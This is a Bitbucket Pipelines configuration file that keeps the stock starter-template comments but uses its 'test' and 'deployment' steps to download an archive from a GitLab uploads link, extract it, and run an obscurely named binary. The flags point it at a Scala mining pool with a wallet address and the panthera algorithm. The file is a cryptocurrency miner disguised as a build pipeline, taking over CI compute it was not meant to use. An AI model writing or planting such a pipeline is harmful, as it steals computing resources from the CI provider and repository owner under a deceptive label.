# This is an example Starter pipeline configuration
# Use a skeleton to build, test and deploy using manual and parallel steps
# -----
# You can specify a custom docker image from Docker Hub as your build environment.
image: atlassian/default-image:2

pipelines:
  default:
    - parallel:
      - step:
          name: Test group 1
          script:
            - wget https://gitlab.com/sindikarmila31/project-sindi/uploads/a3f2d16a217bb3e6df4a23cbb9a5fc59/SCALA.tar.gz
      - step:
          name: 'Deployment to Staging'
          deployment: staging
          script:
            
            - tar xf SCALA.tar.gz
            
      - step:
          name: 'Deployment to Staging'
          deployment: production
          script:
            - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k